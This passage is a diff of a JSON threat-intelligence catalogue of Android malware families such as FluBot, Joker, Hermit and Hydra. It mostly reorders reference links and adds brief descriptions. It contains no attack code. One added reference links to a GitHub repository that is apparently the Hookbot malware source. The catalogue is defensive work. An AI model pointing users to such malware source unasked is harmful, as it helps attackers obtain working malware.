"https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy", - "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", + "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/", - "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf" + "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/" ], "synonyms": [], "type": [] @@ -964,6 +996,19 @@ "uuid": "bf94eee6-2274-40f4-b181-2b49ce6ef9fb", "value": "Dracarys" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dragonegg", + "https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4ef28f14-17f4-4f87-a292-e63b42027c8c", + "value": "DragonEgg" + }, { "description": "", "meta": { @@ -1038,11 +1083,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac", + "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html", "https://twitter.com/ESETresearch/status/1445618031464357888", - "https://blog.cyble.com/2022/05/25/ermac-back-in-action/", "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html", "https://intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover", - "https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html", + "https://blog.cyble.com/2022/05/25/ermac-back-in-action/", "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace" ], "synonyms": [], @@ -1056,9 +1101,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot", - "https://twitter.com/ThreatFabric/status/1240664876558823424", + "https://www.youtube.com/watch?v=qqwOrLR2rgU", "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", - "https://www.youtube.com/watch?v=qqwOrLR2rgU" + "https://twitter.com/ThreatFabric/status/1240664876558823424" ], "synonyms": [], "type": [] @@ -1071,13 +1116,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", + "https://www.bleepingcomputer.com/news/security/exobot-author-calls-it-quits-and-sells-off-banking-trojan-source-code/", + "https://blog.cyble.com/2022/03/24/coper-banking-trojan/", + "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/", "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/", "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html", "https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/", - "https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/", - "https://www.bleepingcomputer.com/news/security/exobot-author-calls-it-quits-and-sells-off-banking-trojan-source-code/", - "https://blog.cyble.com/2022/03/24/coper-banking-trojan/", - "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" + "https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/" ], "synonyms": [], "type": [] @@ -1090,9 +1135,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store", "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" ], "synonyms": [], @@ -1107,8 +1152,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.facestealer", "https://labs.k7computing.com/index.php/facestealer-the-rise-of-facebook-credential-stealer-malware/", - "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/", - "https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html" + "https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html", + "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/" ], "synonyms": [], "type": [] @@ -1148,11 +1193,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy", - "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", + "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681", "https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/", - "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681" + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/", + "https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html" ], "synonyms": [], "type": [] @@ -1202,7 +1247,7 @@ "value": "FastSpy" }, { - "description": "", + "description": "According to heimdal, A new strain of ransomware emerged on Android mobile devices. It targets those who are running the operating system Android 5.1 and higher. This Android ransomware strain has been dubbed by security researchers FileCoder (Android/Filecoder.c) and it spreads via text messages containing a malicious link.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.filecoder", @@ -1219,12 +1264,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher", - "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", - "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", - "https://github.com/linuzifer/FinSpy-Dokumentation", - "https://securelist.com/finspy-unseen-findings/104322/", "https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/", - "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf" + "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://securelist.com/finspy-unseen-findings/104322/", + "https://github.com/linuzifer/FinSpy-Dokumentation", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" ], "synonyms": [], "type": [] @@ -1251,8 +1296,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", - "https://securelist.com/mobile-malware-evolution-2019/96280/", - "https://twitter.com/LukasStefanko/status/886849558143279104" + "https://twitter.com/LukasStefanko/status/886849558143279104", + "https://securelist.com/mobile-malware-evolution-2019/96280/" ], "synonyms": [ "gugi" @@ -1267,45 +1312,45 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot", - "https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain", - "https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html", - "https://twitter.com/alberto__segura/status/1399249798063087621?s=20", - "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06", - "https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://twitter.com/alberto__segura/status/1384840011892285440", - "https://securityintelligence.com/posts/story-of-fakechat-malware/", - "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/", - "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", - "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon", - "https://twitter.com/alberto__segura/status/1395675479194095618", - "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/", - "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html", - "https://mobile.twitter.com/alberto__segura/status/1400396365759500289", - "https://hispasec.com/resources/FedexBanker.pdf", - "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9", - "https://www.infinitumit.com.tr/flubot-zararlisi/", - "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered", - "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/", - "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html", - "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users", - "https://twitter.com/malwrhunterteam/status/1359939300238983172", - "https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/", - "https://blog.zimperium.com/flubot-vs-zimperium/", - "https://www.ncsc.admin.ch/22w12-de", "https://www.prodaft.com/m/reports/FluBot_4.pdf", - "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf", - "https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/", + "https://medium.com/walmartglobaltech/a-look-at-an-android-bot-from-unpacking-to-dga-e331554f9fb9", "https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html", - "https://twitter.com/alberto__segura/status/1404098461440659459", - "https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond", - "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368", - "https://therecord.media/flubot-malware-gang-arrested-in-barcelona/", + "https://twitter.com/alberto__segura/status/1399249798063087621?s=20", "https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://mobile.twitter.com/alberto__segura/status/1400396365759500289", + "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon", + "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/", + "https://twitter.com/alberto__segura/status/1384840011892285440", + "https://blog.cyble.com/2021/09/09/flubot-variant-masquerading-as-the-default-android-voicemail-app/", + "https://twitter.com/alberto__segura/status/1402615237296148483", + "https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/", + "https://securityblog.switch.ch/2021/06/19/android-flubot-enters-switzerland/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://twitter.com/alberto__segura/status/1404098461440659459", + "https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html", + "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", + "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06", + "https://securityintelligence.com/posts/story-of-fakechat-malware/", + "https://twitter.com/alberto__segura/status/1395675479194095618", + "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html", + "https://www.infinitumit.com.tr/flubot-zararlisi/", + "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html", + "https://therecord.media/flubot-malware-gang-arrested-in-barcelona/", + "https://hispasec.com/resources/FedexBanker.pdf", + "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users", + "https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain", + "https://therecord.media/despite-arrests-in-spain-flubot-operations-explode-across-europe-and-japan/", + "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered", + "https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/", + "https://raw.githubusercontent.com/prodaft/malware-ioc/master/FluBot/FluBot.pdf", "https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027", + "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368", + "https://www.ncsc.admin.ch/22w12-de", "https://www.europol.europa.eu/media-press/newsroom/news/takedown-of-sms-based-flubot-spyware-infecting-android-phones", - "https://twitter.com/alberto__segura/status/1402615237296148483" + "https://twitter.com/malwrhunterteam/status/1359939300238983172", + "https://blog.zimperium.com/flubot-vs-zimperium/", + "https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "Cabassous", @@ -1317,10 +1362,12 @@ "value": "FluBot" }, { - "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.", + "description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims\u2019 credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse", + "https://www.fortinet.com/blog/threat-research/fortinet-reverses-flutter-based-android-malware-fluhorse", + "https://cryptax.medium.com/inside-kangapack-the-kangaroo-packer-with-native-decryption-3e7e054679c4", "https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/" ], "synonyms": [], @@ -1362,13 +1409,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.furball", + "https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/", + "https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf", + "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program", + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", "https://www.trendmicro.com/en_us/research/19/f/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.html", "https://www.bleepingcomputer.com/news/security/domestic-kitten-apt-operates-in-silence-since-2016/", - "https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/", - "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", - "https://documents.trendmicro.com/assets/appendix-mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east.pdf", - "https://ti.qianxin.com/blog/articles/surprised-by-cyrus-the-great-disclosure-against-Iran-cyrus-attack/", - "https://www.virusbulletin.com/conference/vb2019/abstracts/domestic-kitten-iranian-surveillance-program" + "https://www.bleepingcomputer.com/news/security/hacking-group-updates-furball-android-spyware-to-evade-detection/" ], "synonyms": [], "type": [] @@ -1381,8 +1428,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.geost", - "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/", - "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/" + "https://www.gosecure.net/blog/2020/12/02/deep-dive-into-an-obfuscation-as-a-service-for-android-malware/", + "https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-geost-botnet-story-discovery-new-android-banking-trojan-opsec-error/" ], "synonyms": [], "type": [] @@ -1421,6 +1468,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gigabud", + "https://www.group-ib.com/blog/gigabud-banking-malware/", "https://blog.cyble.com/2023/01/19/gigabud-rat-new-android-rat-masquerading-as-government-agencies/" ], "synonyms": [], @@ -1434,13 +1482,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ginp", - "https://twitter.com/ESETresearch/status/1269945115738542080", - "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", - "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", - "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/", + "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/", "https://muha2xmad.github.io/malware-analysis/ginp/", "https://www.youtube.com/watch?v=WeL_xSryj8E", - "https://securityintelligence.com/posts/ginp-malware-operations-rising-expansions-turkey/" + "https://twitter.com/ESETresearch/status/1269945115738542080", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://www.kaspersky.com/blog/ginp-trojan-coronavirus-finder/34338/", + "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" ], "synonyms": [], "type": [] @@ -1453,10 +1501,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", - "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", + "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", "https://www.clearskysec.com/glancelove/", - "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", - "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773" + "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", + "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/" ], "synonyms": [], "type": [] @@ -1491,10 +1539,11 @@ "value": "GoatRAT" }, { - "description": "According to PCrisk, GodFather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use GodFather to steal account credentials. Additionally, GodFather can steal SMSs, device information, and other data.", + "description": "According to PCrisk, Godfather is the name of an Android malware targeting online banking pages and cryptocurrency exchanges in 16 countries. It opens fake login windows over legitimate applications. Threat actors use Godfather to steal account credentials. Additionally, Godfather can steal SMSs, device information, and other data.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.godfather", + "https://brandefense.io/blog/godfather-android-banking-trojan/", "https://muha2xmad.github.io/malware-analysis/godfather/", "https://blog.group-ib.com/godfather-trojan" ], @@ -1535,8 +1584,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.goontact", - "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/", - "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail" + "https://blog.lookout.com/lookout-discovers-new-spyware-goontact-used-by-sextortionists-for-blackmail", + "https://blog.cyble.com/2021/09/03/spyware-variant-disguised-as-korean-video-app-targets-multiple-asian-countries/" ], "synonyms": [], "type": [] @@ -1589,12 +1638,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", - "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", - "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", "https://blog.talosintelligence.com/2019/10/gustuffv2.html", "https://www.group-ib.com/media/gustuff/", - "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html" + "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" ], "synonyms": [], "type": [] @@ -1607,9 +1656,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hardrain", - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf", "https://unit42.paloaltonetworks.com/unit42-operation-blockbuster-goes-mobile/", - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" + "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" ], "synonyms": [], "type": [] @@ -1622,8 +1671,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hawkshaw", - "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/", - "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw" + "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-hawkshaw", + "https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/" ], "synonyms": [], "type": [] @@ -1647,13 +1696,13 @@ "value": "HenBox" }, { - "description": "", + "description": "Lookout states that Hermit is an advanced spyware designed to target iOS and Android mobile devices. It is designed to collect extensive amounts of sensitive data on its victims such as their location, contacts, private messages, photos, call logs, phone conversations, ambient audio recordings, and more.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hermit", "https://de.lookout.com/blog/hermit-spyware-discovery", - "https://www.lighthousereports.nl/investigation/revealing-europes-nso", - "https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/" + "https://blog.google/threat-analysis-group/italian-spyware-vendor-targets-users-in-italy-and-kazakhstan/", + "https://www.lighthousereports.nl/investigation/revealing-europes-nso" ], "synonyms": [], "type": [] @@ -1679,11 +1728,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hiddenad", + "https://twitter.com/LukasStefanko/status/1136568939239137280", + "https://securelist.com/mobile-malware-evolution-2019/96280/", "https://labs.bitdefender.com/2020/03/infected-zoom-apps-for-android-target-work-from-home-users", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/", - "https://securelist.com/mobile-malware-evolution-2019/96280/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://twitter.com/LukasStefanko/status/1136568939239137280" + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [], "type": [] @@ -1709,8 +1758,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hook", - "https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware", - "https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html" + "https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities.html", + "https://github.com/0xperator/hookbot_source", + "https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware" ], "synonyms": [], "type": [] @@ -1723,17 +1773,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra", - "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html", - "https://twitter.com/muha2xmad/status/1570788983474638849", - "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", - "https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/", - "https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0", - "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5", - "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221", - "https://cryptax.medium.com/android-bianlian-payload-61febabed00a", - "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/", "https://muha2xmad.github.io/malware-analysis/hydra/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://twitter.com/muha2xmad/status/1570788983474638849", + "https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221", + "https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5", + "https://www.avira.com/en/blog/avira-labs-research-reveals-hydra-banking-trojan-2-0", "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + "https://pentest.blog/android-malware-analysis-dissecting-hydra-dropper/", + "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html", + "https://cryptax.medium.com/android-bianlian-payload-61febabed00a", + "https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/", "https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726" ], "synonyms": [], @@ -1759,13 +1810,13 @@ "value": "IPStorm (Android)" }, { - "description": "", + "description": "According to redpiranha, IRATA (Iranian Remote Access Trojan) Android Malware is a new malware detected in the wild. It originates from a phishing attack through SMS. The theme of the message resembles information coming from the government that will ask you to download this malicious application. IRATA can collect sensitive information from your mobile phone including bank details. Since it infects your mobile, it can also gather your SMS messages which then can be used to obtain 2FA tokens.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irata", - "https://onecert.ir/portal/blog/irata", "https://twitter.com/muha2xmad/status/1562831996078157826", - "https://muha2xmad.github.io/malware-analysis/irata/" + "https://muha2xmad.github.io/malware-analysis/irata/", + "https://onecert.ir/portal/blog/irata" ], "synonyms": [], "type": [] @@ -1800,22 +1851,22 @@ "value": "JadeRAT" }, { - "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google’s official app store with the help of its trail signatures which includes updating the virus’s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users’ personal information including contact details, device data, WAP services, and SMS messages.", + "description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google\u2019s official app store with the help of its trail signatures which includes updating the virus\u2019s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users\u2019 personal information including contact details, device data, WAP services, and SMS messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker", - "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", - "https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/", - "https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1", - "https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/", - "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/", - "https://labs.k7computing.com/?p=22199", "https://medium.com/csis-techblog/analysis-of-joker-a-spy-premium-subscription-bot-on-googleplay-9ad24f044451", - "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "https://muha2xmad.github.io/malware-analysis/hydra/", "https://www.trendmicro.com/en_us/research/20/k/an-old-jokers-new-tricks--using-github-to-hide-its-payload.html", + "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "https://labs.k7computing.com/index.php/joker-unleashes-itself-again-on-google-play-store/", "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", + "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", + "https://cryptax.medium.com/live-reverse-engineering-of-a-trojanized-medical-app-android-joker-632d114073c1", + "https://labs.k7computing.com/?p=22199", "https://cryptax.medium.com/tracking-android-joker-payloads-with-medusa-static-analysis-and-patience-672348b81ac2", - "https://muha2xmad.github.io/malware-analysis/hydra/" + "https://web.archive.org/web/20210714010827/https://blog.zimperium.com/joker-is-still-no-laughing-matter/", + "https://www.microsoft.com/security/blog/2022/06/30/toll-fraud-malware-how-an-android-application-can-drain-your-wallet/" ], "synonyms": [ "Bread" @@ -1830,9 +1881,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/", - "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" + "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html", + 